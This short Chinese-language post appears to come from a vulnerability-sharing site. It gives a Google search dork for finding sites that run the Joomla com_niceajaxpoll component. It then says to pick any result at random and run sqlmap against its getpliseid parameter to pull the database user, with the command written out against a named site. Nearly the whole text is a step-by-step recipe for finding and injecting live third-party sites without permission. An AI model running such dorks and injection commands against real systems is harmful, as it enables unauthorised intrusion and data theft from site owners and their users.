1.google 语法:
inurl:"/index.php?option=com_niceajaxpoll"
![](https://images.seebug.org/contribute/d15caa7b-9f18-48c0-9829-d5f0e1500bb2-11.png)
2.随便打开一个网站,利用sqlmap 进行注入.
sqlmap.py -u "http://www.cevosop.com/index.php?option=com_niceajaxpoll&getpliseid=" --current-user
![](https://images.seebug.org/contribute/cca821ff-c831-4320-96ad-ffdeec0804d6-22.png)
暂无评论